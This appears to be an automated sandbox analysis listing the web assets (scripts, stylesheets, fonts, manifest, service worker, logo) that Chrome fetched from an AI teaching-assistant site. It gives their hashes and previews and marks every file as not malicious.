                                                                                        Preview:._linkStyle_lcl54_1{color:var(--accentText)!important}._appBackground_rph9y_1{background-color:var(--authPageBg)}._formColors_rph9y_5{background-color:var(--authFormBg);border-color:var(--authFormBorder)}._activeTab_rph9y_10{color:var(--tabActiveText);border-bottom-color:var(--tabActiveBorder);border-bottom-width:var(--tabBottomBorderWidth);border-style:solid}._inactiveTab_rph9y_17{color:var(--tabInactiveText);border-bottom-color:var(--tabInactiveBorder);border-bottom-width:var(--tabBottomBorderWidth);border-style:solid}._continueText_rph9y_24{color:var(--grayText);background-color:var(--authFormBg)}._continueBorder_rph9y_29{border-color:var(--grayLine)}._socialMediaButton_rph9y_33{background-color:var(--white);border-color:var(--authFormBorder);color:var(--grayText)}._socialMediaButton_rph9y_33:hover{background-color:var(--grayBase)}._roboto_rph9y_43{font-family:Roboto;font-weight:500}._segoe_rph9y_48{font-family:Segoe UI;font-weight:600}.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (4627)
                                                                                        Category:dropped
                                                                                        Size (bytes):4671
                                                                                        Entropy (8bit):5.267638603283862
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:68D54120A1BAB83FCF6AE8D15A65F09E
                                                                                        SHA1:9355999BDEF85069D8E932EBEF0020DC25632F09
                                                                                        SHA-256:C5924D1F824217E5A574AADF0E2F386B99268C39A6E4A4DECC543F7D385172B0
                                                                                        SHA-512:67371A3F0438E3FF0DD5FF4A16E731BF6932A283B0FBCFF9515459995F221F6C6ABC23D358E603B26E5C583F4FC86425BD65AE5182875C27361B21987D51B636
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{r as i,a8 as A,a9 as H,j as u,ab as L,aa as G,be as K,ai as O,ad as _,ae as P,ac as E,af as b,ag as $,db as U,bH as V,dd as W,dc as Z,de as q,aj as z,ak as B,ah as J}from"./index.CmaSzYmM.js";var R="Popover",[j,se]=G(R,[A]),g=A(),[Q,d]=j(R),w=e=>{const{__scopePopover:n,children:r,open:a,defaultOpen:o,onOpenChange:t,modal:s=!1}=e,c=g(n),p=i.useRef(null),[l,h]=i.useState(!1),[C=!1,f]=H({prop:a,defaultProp:o,onChange:t});return u.jsx(L,{...c,children:u.jsx(Q,{scope:n,contentId:K(),triggerRef:p,open:C,onOpenChange:f,onOpenToggle:i.useCallback(()=>f(x=>!x),[f]),hasCustomAnchor:l,onCustomAnchorAdd:i.useCallback(()=>h(!0),[]),onCustomAnchorRemove:i.useCallback(()=>h(!1),[]),modal:s,children:r})})};w.displayName=R;var F="PopoverAnchor",X=i.forwardRef((e,n)=>{const{__scopePopover:r,...a}=e,o=d(F,r),t=g(r),{onCustomAnchorAdd:s,onCustomAnchorRemove:c}=o;return i.useEffect(()=>(s(),()=>c()),[s,c]),u.jsx(E,{...t,...a,ref:n})});X.displayName=F;var N="PopoverTrigger",y=i.forwardRef((e,n)=>{con
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 42672, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):42672
                                                                                        Entropy (8bit):7.993551568828384
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:313C8623838A8F431E533AC98EBDD9AD
                                                                                        SHA1:F0C53FFB6CD19E9AF37C7B60DF45C7C4E11AC796
                                                                                        SHA-256:A29A97013AD393D493ACB1E33515D103C2F6A2CF6634250FAF7CC176720A6135
                                                                                        SHA-512:247FAE49D012B7A710E64339FC9143D940342C03C31E8282C5FC51B1B8D9F912B583D5AB036A8D7A89EA612BD243F05C082CAFD055E744285F2F310140054DE1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://fonts.gstatic.com/s/dancingscript/v25/If2RXTr6YS-zF4S-kcSWSVi_szLgiuE.woff2
                                                                                        Preview:wOF2..............T....=.................................J?HVAR.u.`?STATX'...:/L.....|..Z..v.0..T.6.$..h. ........[.<q....3..5.[.4..n..q...,M.. (F.8..... ....M*2f............gx.!S.0NY%.......c.!.R#.s\..Ht."BbyM...m0.V6..L......2...nre"...&....v.J..fd.T...6w+.8e]..."..d...z..2.._............g75.4Y...p-..Up.6....j............#......O|i.B.Z!oU.M...2:30......,.z..../:....'..L.K2W......]b...=qv.#.....r1!..<.K.Qq.b.*-..+@].F.*"P..W.~5..b<...4E.t._.<........1..C.B!.mJ..L.k]..N.Ru.P3....).$.#.{....9Z..........?...4Kt.7......u....u...m....!!.R...).. R...vy..t./..v8.....B8$.C..r.9.H..c{.m.c.7.w..6ME.G.(..Q..I... t........J.h......(!.%.2|1......c....x..6.6+.....?Wd.x.&..3.h`....L.o......k.[.G...]$.11:'..v7..q.N.Ls...?.x.........\...bE}H.P..q.u..J;....{..g....no..a..tJ...I..........T..;......).*..5`~..,..Z..s.%.."OK..G. ..2......=..c.`..Z.......?....u...&......x.R.:.X...............]._........jv.W...O.....l...."......Y...* ]UU.....tE.y6...$!..b^~Yi
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 40128, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):40128
                                                                                        Entropy (8bit):7.994526034157349
                                                                                        Encrypted:true
                                                                                        SSDEEP:
                                                                                        MD5:9A01B69183A9604AB3A439E388B30501
                                                                                        SHA1:8ED1D59003D0DBE6360481017B44665153665FBE
                                                                                        SHA-256:20B535FA80C8189E3B87D1803038389960203A886D502BC2EF1857AFFC2F38D2
                                                                                        SHA-512:0E6795255B6EEA00B5403FD7E3B904D52776D49AC63A31C2778361262883697943AEDCB29FEEE85694BA6F19EAA34DDDB9A5BFE7118F4A25B4757E92C331FECA
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://fonts.gstatic.com/s/roboto/v47/KFO7CnqEu92Fr1ME7kSn66aGLdTylUAMa3yUBA.woff2
                                                                                        Preview:wOF2..............$....F..........................p.....t?HVAR...`?STAT.N'...B..~.../~.....`..i..X.0..j.6.$..,. .... ..N[{.q.v...Lw.Q..o..J...6.Z.g.F.n..g\{t....%.!3)....sS.o...$."c.^<.iZc.I]c....0+. ..I..9.H.3..B.&.....'e....5.p.R(.j~\=..Wt.{..1.[u..Fn..<.-g.3..L..o.....E.-Q.........I..-/.4....{.Uj...3.K...g.Z....0...2)%.{......gN.../f.7....o.K....^V...!j...<...gf....\XjI.<p.PJh.4....*,*.S....&.C...R..,@ba..<..z.|.X.&.(.mf.w[..l.35Mp...A.A.=d........fj...}W6..y....[...i.......!........NLND....n'"...N*k)0<n.P.......w.j..>9.vV...Z.`.$$!.".(.`ATV.,..0.]3.<.d(...-s...2.w....P@.&...-.9x7.'....Sg.N=m.=....(..))-bA<.x.......=@4qs..Ss......K...{.=H.......z...NUS....Y..6.K.......n.....F4.B....=w.....+..F3...fB..........y1...,.(...`,..&vIrP.^.fiQY..5....H.a......q...s."..\..':.xK}...fU.z.j.......$L.......f.g&....R...!.Wmew3.1%2W.'"6u..r.q"F.......~i{..9xN.g.X..NMx.H.s@.8..J.t.SP.C`-GU)G/'..6".+......f..n..Aw....r....l.<r...Cke..D....T/."..c..mj..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JSON data
                                                                                        Category:downloaded
                                                                                        Size (bytes):606
                                                                                        Entropy (8bit):4.8638548790127185
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:7DD964D80F66A2E591031055404AF7EC
                                                                                        SHA1:CF2218BA2942514E9211E45B476959A608026F28
                                                                                        SHA-256:16D1B0626FB08204A7971B93C4AA4B8806AAE8DE9FF45A68DA52A028807459CE
                                                                                        SHA-512:0C7350F641DD00841F04896376CD4C167BB5180984699EE46D8BE52FC69B733F18FE028F48857DDFF732BD50BE0C0289E7E36A1DB4792FD17BC8102B6D8FDE34
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/manifest.webmanifest
                                                                                        Preview:{"name":"Alayna AI","short_name":"Alayna","start_url":"/client/","display":"standalone","background_color":"#ffffff","lang":"en","scope":"/client/","description":"Your AI teaching assistant - AI powered lesson planning, slides generation, personalized learning and more!","theme_color":"#ffffff","icons":[{"src":"imgs/pwa-64x64.png","sizes":"64x64","type":"image/png"},{"src":"imgs/pwa-192x192.png","sizes":"192x192","type":"image/png"},{"src":"imgs/pwa-512x512.png","sizes":"512x512","type":"image/png"},{"src":"imgs/maskable-icon-512x512.png","sizes":"512x512","type":"image/png","purpose":"maskable"}]}.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:gzip compressed data, from Unix, original size modulo 2^32 8587
                                                                                        Category:dropped
                                                                                        Size (bytes):2680
                                                                                        Entropy (8bit):7.924714246250542
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:AF59C8E2AC28D93CB2BC089A245EF7A7
                                                                                        SHA1:F4708E557007446EF23368B54B4A80473948164A
                                                                                        SHA-256:662E2DCCB8FFE52C674E073CA9419819BC948708067C40483E16EF8390F08DB8
                                                                                        SHA-512:0231E90226E5F524A0EEA5AF3F5BC8CB4432AB5B1A1BCD95E090ED1C7BE6E0AAF027755B66A93E5745BEB825CDCD0E40DA3692D9A0CF2A2C99ADB43181955549
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:...........Y{O.:..*!.E...B)..A.t....pw.`Q.6nkH...vJ...;.6....V...>>....~FO..%....]#....a..)}"T`>b..1.^[|y..0.8M.....q...-....#g.. ...Q$...AM$...h.....2....S.b.2.g.k.1.=a...z.....v{.#..0..t.D#...... ..Q.xo.t..Z*.....A=l%!.a.6M.-..<..JJ.=.F.E.M..).R.^.'.4...R..4.F b.h.+'V.k..w.u...AA..k.......&.i..ta.z@.u..>.`..kO.{.......B'.q<wG)O.wb......N8Ki.....t.x.z.o6%..&..%D.....S..B'..3*:c?".[...4..........b.#...S..O..C.'8p;...a.|.f..E2.C....0.p? i.....X*BBq......#.>-.N...*.,=.[$..1...l..h.S...:.....v.hR....4rK.N.C........+8..].Y.v..m..VYor..cq....A.....~.|.#...2..u...}.l..X..K.....8.G`..eN&S.tmX_e.Nh....+.SN.I.].C...{.. I,.;......p.,.p6.J,.TbO*..`.G..3...(...'.^H T..0d.'..sA..:..... ...n...v;.v../uA.*wk*O..{.G.q....v...3..e....FY$.p..v.E...n<..'oJ..)Cm=.A5...kMR.%o...{....Q-e.k~=..b^.<..1.k..h...]=Q....t.`..%PrJ.r..xn.....P0....<...).V.`r.I..S.D.\...0..7d...._..b:.`..?.KU.=z/.\ba.Fp.a........"R.1.......g?L.N.F ..k...Lt=|......p.../@.9.>......K.IU.W.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (2237)
                                                                                        Category:downloaded
                                                                                        Size (bytes):2244
                                                                                        Entropy (8bit):5.13041416225336
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B4EA815E93628C9A840C0B0BA75BD741
                                                                                        SHA1:0DAADF792D3723F22F1218E559B9E86D2A95A353
                                                                                        SHA-256:89780EBE3E22B7868446E1E256D427F0E271B0EF66E1B6A6D6B5238518B350DE
                                                                                        SHA-512:36B0C653D2299D0E344117A3A502DE5FE64EEA62DB0C1624FF824943C76D2AB637DEE72D174E1E80AAEF2F616802EC33ABD376D3A4B5C587636CCFB271EDE12D
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Layout.mRBQSVK9.css
                                                                                        Preview:._star_qt2yr_5{transition:transform .3s ease-in-out}._star_qt2yr_5 svg{color:var(--grayBorder)!important}._star_qt2yr_5:hover{transform:scale(1.3);transition-delay:.1s}._star_qt2yr_5:active{transform:scale(1.6);transition-delay:.05s}._darkStar_qt2yr_23 svg{fill:var(--grayBorder)}._goldStar_qt2yr_27 svg{fill:gold}._star_qt2yr_5:nth-child(1)._goldStar_qt2yr_27{transition-delay:.1s}._star_qt2yr_5:nth-child(2)._goldStar_qt2yr_27{transition-delay:.2s}._star_qt2yr_5:nth-child(3)._goldStar_qt2yr_27{transition-delay:.3s}._star_qt2yr_5:nth-child(4)._goldStar_qt2yr_27{transition-delay:.4s}._star_qt2yr_5:nth-child(5)._goldStar_qt2yr_27{transition-delay:.5s}._thumbUp_qt2yr_55._swipeLeft_qt2yr_55,._thumbDown_qt2yr_56._swipeLeft_qt2yr_55{transition:transform .3s ease-in-out;transform:translate(-20px)}._thumbUp_qt2yr_55._swipeLeft_qt2yr_55:before,._thumbDown_qt2yr_56._swipeLeft_qt2yr_55:before{content:attr(data-emoji);color:inherit!important;position:absolute}._thumbUp_qt2yr_55{--emoji: ".."}._thum
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:JSON data
                                                                                        Category:dropped
                                                                                        Size (bytes):144
                                                                                        Entropy (8bit):4.54178832719941
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F447C440ABF2B8AF203938329FE494F8
                                                                                        SHA1:3E071AE6400D84FB2EBE38EAEE60E1161D9F4556
                                                                                        SHA-256:11BBA994684E05187E8CB291F03254CE7810FB3EABBC900299F078F2E584550F
                                                                                        SHA-512:BC05CEC72D8512A1CE483156BDCD963199EBFFD224D991AABAD638D3FA075CD7C96E20B20B85C7224925B8263143772174B3BC824EA258C0B196C83E03007C9F
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:{"errors":[{"code":"media_type_not_acceptable","message":"The Accept header should send a media type of application/json"}],"type":"error.list"}
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (33720)
                                                                                        Category:dropped
                                                                                        Size (bytes):1136302
                                                                                        Entropy (8bit):5.472929379854313
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:0D73A4E42766515E7078D0175729E898
                                                                                        SHA1:58750543688AD62A09047357F7EB5014874DB752
                                                                                        SHA-256:8B52EAA4CE0A48C01C25237ECAF59F4FDE179AA8969EB79B0B09B875FF494569
                                                                                        SHA-512:36CE2275DAD7958FAD2C1C38FBC21E2E1BB0A5462CBE136F6908A3F1F96BC5501F5037EDE891D1D02C5C6F7AEF8D46D22F83EAA584954DABE0CCE2B91422E6E0
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        Preview:import{j as b,G as me,r as z,bI as Bv,d1 as Rv,co as Lv,aO as zi,d as _t,a5 as zv,an as Eh,X as Bc,o as Sh,a as Ah,ar as da,d6 as Pv,d7 as $v,d8 as Hv,d9 as Vv,aW as qv,Y as Uv}from"./index.CmaSzYmM.js";import{k as Wv,d as Fh}from"./decode.I0H7hHej.js";import{T as ke}from"./index.D1TXq2aj.js";import{R as Kv,T as Gv,P as Jv,C as Yv}from"./index.DUmOG7j4.js";import{R as Zv,T as Xv,V as Qv,I as ej,P as tj,C as nj,a as oj,c as sj,d as ij,b as aj}from"./index.CtWPaFVW.js";import{Y as rj}from"./YouTube.DOFcxXms.js";import{u as lj,T as cj}from"./Transition.1nOyKJ9c.js";function pj(t){return b.jsx("svg",{width:"20",height:"20",viewBox:"0 0 16 16",fill:"currentColor",xmlns:"http://www.w3.org/2000/svg",...t,children:b.jsx("path",{fillRule:"evenodd",d:"M4 12.5a.5.5 0 0 1 .5-.5h7a.5.5 0 0 1 0 1h-7a.5.5 0 0 1-.5-.5zm-2-3a.5.5 0 0 1 .5-.5h11a.5.5 0 0 1 0 1h-11a.5.5 0 0 1-.5-.5zm2-3a.5.5 0 0 1 .5-.5h7a.5.5 0 0 1 0 1h-7a.5.5 0 0 1-.5-.5zm-2-3a.5.5 0 0 1 .5-.5h11a.5.5 0 0 1 0 1h-11a.5.5 0 0 1-.5-.5z"})
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1674 x 1674, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):117579
                                                                                        Entropy (8bit):7.393129243238629
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:B281544C4AC66E319236564717D25FB7
                                                                                        SHA1:04196F6DC3E6F73692B52EFD919992A9773B7634
                                                                                        SHA-256:77FD049CF15E4A9E97E09FCC0002297FA41B3CF0941624650556BCCC3CFA0847
                                                                                        SHA-512:A239B551E84D2DB8E7FC13F81CB5332DECEC05EA6553EA6CE180FD50BE1D73B4F34502CC5DD3AB9006DD22B7A3E3BEA54A72FE351E433850A2F8D022038C7151
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/imgs/logos/logo-no-text.png
                                                                                        Preview:.PNG........IHDR...............-....@iCCPICC Profile..H..W.XS...[..@B. %.&...RBh..w.!..J...bG..\.*...."..fG.,../.T.u.`W............9.3...{....\.8... OT ...`$..2HO.....0.#..|1+::..2.......Y{.A.....Z4..|..H4...|^......ybI..D.o>.@,..m.....2....2...{.6.l...PQ.r%....A.Q....>..D|...u..yy....Al.m......?.d.M3}H.......J.0_.........\..+X.$...9......j....#. ..../....dIC....!/..s.t!v.s..!6.8X......3......A...8...A.@......(....6dH.,%..+...../.I`)._g.8J}.V....1.b.Bab$.4...s..6.....6.i.,~..c.....>V.!..U.......%.D*...PE~.6.W.?..vI b%....#......).=....:.......8E........!2..b...8.X<...H.>.!...W..es....KA.`.@..RX..$........N....@.2..8(...I.....".'D..?4.@.+....:.*.. C.[(....@...A....G...%.....;.V..7.VY........2.JF:.>hI."..C..D[......x....g...nOxB.$<$\#t.nM..K~.r.....\......j.....T...n..pW..A.n.e+.e....f...P...(y..l..H...mHE....5}(.......>...?[b.......v.;.5..v.k..#2<....W..Xy<9PG....OV..|.:.../....T.;..'..I..Y....".....q.........E..z.#.n ...y...sl``..w....{=
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (18770)
                                                                                        Category:downloaded
                                                                                        Size (bytes):18804
                                                                                        Entropy (8bit):5.3668267010367945
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:5A4476392C56175FCF35D9DEB67C050E
                                                                                        SHA1:7F0FDF17DF8D76DA675736FBB2008AA6B6216BF6
                                                                                        SHA-256:AB470AC8DB0C3FC42FE2D22D263AA6DF258FF003E6D979E49C9D0C960D75984C
                                                                                        SHA-512:D3A18659228E1519A345B1E06DCA9B6FD5BE6E608AAFCF360C23602D74D33F03545B3EF5EAA99223846EF647B08F8E29B5EE817EA3EBD752E749F635EB374092
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/sw.js
                                                                                        Preview:if(!self.define){let s,e={};const i=(i,r)=>(i=new URL(i+".js",r).href,e[i]||new Promise((e=>{if("document"in self){const s=document.createElement("script");s.src=i,s.onload=e,document.head.appendChild(s)}else s=i,importScripts(i),e()})).then((()=>{let s=e[i];if(!s)throw new Error(`Module ${i} didn.t register its module`);return s})));self.define=(r,n)=>{const l=s||("document"in self?document.currentScript.src:"")||location.href;if(e[l])return;let o={};const a=s=>i(s,l),c={module:{uri:l},exports:o,require:a};e[l]=Promise.all(r.map((s=>c[s]||a(s)))).then((s=>(n(...s),o)))}}define(["./workbox-296e213d"],(function(s){"use strict";self.addEventListener("message",(s=>{s.data&&"SKIP_WAITING"===s.data.type&&self.skipWaiting()})),s.precacheAndRoute([{url:"assets/ActivateUser.CFVvUFSP.js",revision:null},{url:"assets/ActivateUser.sXFMIOsx.css",revision:null},{url:"assets/ActiveTool.BqIvIPyM.css",revision:null},{url:"assets/ActiveTool.DehqpDq-.js",revision:null},{url:"assets/AiToolProvider.BNBOs
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text
                                                                                        Category:downloaded
                                                                                        Size (bytes):1776
                                                                                        Entropy (8bit):4.594956707081927
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:F38B2DB10E01B1572732A3191D538707
                                                                                        SHA1:A94A059B3178B4ADEC09E3281ACE2819A30095A4
                                                                                        SHA-256:DE1E399B07289F3B0A8D35142E363E128124A1185770E214E25E58030DAD48E5
                                                                                        SHA-512:C11E283612C11DFEEC9A3CB42B8A2ACDD5AE99DFABE7FFBA40EFEF0DD6BBE8C5B98AE8383D3EEFF3A168124C922097EDDD703401EE9AC6122F1EBAB09BBF7737
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://cdn.jsdelivr.net/npm/slick-carousel@1.8.1/slick/slick.css
                                                                                        Preview:/* Slider */..slick-slider.{. position: relative;.. display: block;. box-sizing: border-box;.. -webkit-user-select: none;. -moz-user-select: none;. -ms-user-select: none;. user-select: none;.. -webkit-touch-callout: none;. -khtml-user-select: none;. -ms-touch-action: pan-y;. touch-action: pan-y;. -webkit-tap-highlight-color: transparent;.}...slick-list.{. position: relative;.. display: block;. overflow: hidden;.. margin: 0;. padding: 0;.}..slick-list:focus.{. outline: none;.}..slick-list.dragging.{. cursor: pointer;. cursor: hand;.}...slick-slider .slick-track,..slick-slider .slick-list.{. -webkit-transform: translate3d(0, 0, 0);. -moz-transform: translate3d(0, 0, 0);. -ms-transform: translate3d(0, 0, 0);. -o-transform: translate3d(0, 0, 0);. transform: translate3d(0, 0, 0);.}...slick-track.{. position: relative;. top: 0;. left: 0;.. display: block;. margin-l
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (19696)
                                                                                        Category:downloaded
                                                                                        Size (bytes):539247
                                                                                        Entropy (8bit):5.426467448217618
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:ABC415A366FEB91DADE39B564F677544
                                                                                        SHA1:0DEB5DFC18408F3D6099A03970E0AAB88D7800C8
                                                                                        SHA-256:A7B00247936A62F0C4ADBDA023A5E304049475BB20B4909D5741809F3F2F7B73
                                                                                        SHA-512:C17A613286D32F506FCEF829EDE510155E87E825F026237C8F88E6D27AC33A481B0CEF09389CBDB80EDE50EE7C120B926BB0422F058FFDB195C3BD3DE7130633
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/ActiveTool.DehqpDq-.js
                                                                                        Preview:import{T as jl,i as ms,e as Nl,f as Rd,g as Ld,h as kl,k as Zs,K as ke,O as Gr,L as Md,_ as jt,R as Fd,l as Tn,m as ft,n as $d,A as Ud,p as Bd,q as zd,s as Kd,t as Hd,v as _l,w as Si,x as Il,y as Wd,z as ji,N as $r,C as Cl,D as Ol,r as f,E as gr,F as qd,j as i,G as Q,H as Ke,P as ce,o as Qe,c as Jt,I as Ut,a as rt,J as Tt,M as Yr,Q as St,U as ze,V as eo,W as to,d as re,X as be,Y as pt,Z as Yt,$ as Vt,a0 as Rs,S as Fn,a1 as Ls,a2 as Gd,a3 as Yd,a4 as Vd,a5 as Xd,a6 as Qd,a7 as Jd,a8 as El,a9 as Zd,aa as eu,ab as tu,ac as nu,ad as ru,ae as an,af as Al,ag as su,ah as iu,ai as au,aj as ou,ak as lu,al as cu,am as Dt,an as ei,ao as ti,ap as ni,aq as Te,B as gt,ar as bt,b as pn,as as hn,at as du,u as uu,au as fu,av as no}from"./index.CmaSzYmM.js";import{U as jr,A as pu}from"./AITools.DdDAMa67.js";import{u as ot,S as Ni,F as ro,L as hu,Q as mu,a as gu,b as bu,c as vu,A as xu}from"./AiToolProvider.DS2zOm_j.js";import{L as Pl}from"./Loading.KnQROg-F.js";import{M as qe,p as Fe,r as Ge,a as Ye,b a
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (1001)
                                                                                        Category:downloaded
                                                                                        Size (bytes):1047
                                                                                        Entropy (8bit):4.7030455409669205
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:368919533F9386A871445A035D012987
                                                                                        SHA1:1577314594814D770FF15941A703FCCB4F62B743
                                                                                        SHA-256:85D2E73D09656EE1C4A7EE74D6AD6629ED77E344D72C5E0A10E40F43736D0276
                                                                                        SHA-512:5199CF6751D86BF676A012D4EDF37A737804399CFC888ADC69F65DEECEADFF253B055A88DD2691AC511A7B9A9C5CD370C5C62A400CDDEEC76D91A3B9187F71B7
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/YouTube.DOFcxXms.js
                                                                                        Preview:import{j as c}from"./index.CmaSzYmM.js";function o(l){return c.jsx("svg",{width:"20",height:"20",viewBox:"0 0 16 16",fill:"currentColor",xmlns:"http://www.w3.org/2000/svg",...l,children:c.jsx("path",{d:"M8.051 1.999h.089c.822.003 4.987.033 6.11.335a2.01 2.01 0 0 1 1.415 1.42c.101.38.172.883.22 1.402l.01.104.022.26.008.104c.065.914.073 1.77.074 1.957v.075c-.001.194-.01 1.108-.082 2.06l-.008.105-.009.104c-.05.572-.124 1.14-.235 1.558a2.007 2.007 0 0 1-1.415 1.42c-1.16.312-5.569.334-6.18.335h-.142c-.309 0-1.587-.006-2.927-.052l-.17-.006-.087-.004-.171-.007-.171-.007c-1.11-.049-2.167-.128-2.654-.26a2.007 2.007 0 0 1-1.415-1.419c-.111-.417-.185-.986-.235-1.558L.09 9.82l-.008-.104A31.4 31.4 0 0 1 0 7.68v-.123c.002-.215.01-.958.064-1.778l.007-.103.003-.052.008-.104.022-.26.01-.104c.048-.519.119-1.023.22-1.402a2.007 2.007 0 0 1 1.415-1.42c.487-.13 1.544-.21 2.654-.26l.17-.007.172-.006.086-.003.171-.007A99.788 99.788 0 0 1 7.858 2h.193zM6.4 5.209v4.818l4.157-2.408L6.4 5.209z"})})}export{o as Y}
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (19296)
                                                                                        Category:downloaded
                                                                                        Size (bytes):46103
                                                                                        Entropy (8bit):5.4790332603480545
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:58B14EBCFDAD0DB3CDCF58EA82ADB2E6
                                                                                        SHA1:86FB3E371160C130195D6F67D634247CCA6CE07B
                                                                                        SHA-256:AA5EB06C4DB4B8A23CEF6B9DB0F7A2ECEB409D820416E418114365AFEE7B33AF
                                                                                        SHA-512:5A168C8DB0314B5D5FB931C1DEDB5C2205D011DA72D2F2D233581C9EDC88DD0419DE454610548ED2183E52F2A4F738F72633C354F760CCBEB0618F9AF0367FB1
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Auth.DFj5DoB1.js
                                                                                        Preview:import{G as ke,r as A,j as o,aw as yr,d as De,o as wr,a as vr,b as Sr,ax as br,c as jr,J as Ir,as as bt,U as Ar,S as Nr,B as tt,X as Cr}from"./index.CmaSzYmM.js";import{i as kr}from"./isEmail.CmuxgFox.js";import{A as rt}from"./index.B_-yKeea.js";import{I as jt}from"./index.CLF8hfvb.js";import"./ExclamationTriangleIcon.BNGKdN9E.js";var G=function(){return G=Object.assign||function(t){for(var r,s=1,n=arguments.length;s<n;s++){r=arguments[s];for(var a in r)Object.prototype.hasOwnProperty.call(r,a)&&(t[a]=r[a])}return t},G.apply(this,arguments)};function ze(e,t,r){if(r||arguments.length===2)for(var s=0,n=t.length,a;s<n;s++)(a||!(s in t))&&(a||(a=Array.prototype.slice.call(t,0,s)),a[s]=t[s]);return e.concat(a||Array.prototype.slice.call(t))}var I="-ms-",Ce="-moz-",g="-webkit-",Gt="comm",We="rule",gt="decl",Rr="@import",zt="@keyframes",Er="@layer",Lt=Math.abs,xt=String.fromCharCode,lt=Object.assign;function _r(e,t){return O(e,0)^45?(((t<<2^O(e,0))<<2^O(e,1))<<2^O(e,2))<<2^O(e,3):0}function M
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Java source, ASCII text, with very long lines (4278)
                                                                                        Category:downloaded
                                                                                        Size (bytes):4322
                                                                                        Entropy (8bit):5.527400941549168
                                                                                        Encrypted:false
                                                                                        SSDEEP:
                                                                                        MD5:FDDF93419974DFE59CEFCBBDD1F3ABD6
                                                                                        SHA1:AE0B91B0CA833B969FCEBDFC48DA14CDEDD28430
                                                                                        SHA-256:B50DE8E42D0FFDB92DF780A8557F823479EA2AC8259232B4BB04E85C83A200FE
                                                                                        SHA-512:F78863A6097A0DBBFF14A1CC56044BE4052F1726534A47332F5BD3BC37CFBA7A24546467100F3900F2FB088AF7D0D9C2399FF81484741CAE891DBDCC130D262E
                                                                                        Malicious:false
                                                                                        Reputation:unknown
                                                                                        URL:https://app.alayna.us/client/assets/Modal.Bgpq4lFm.js
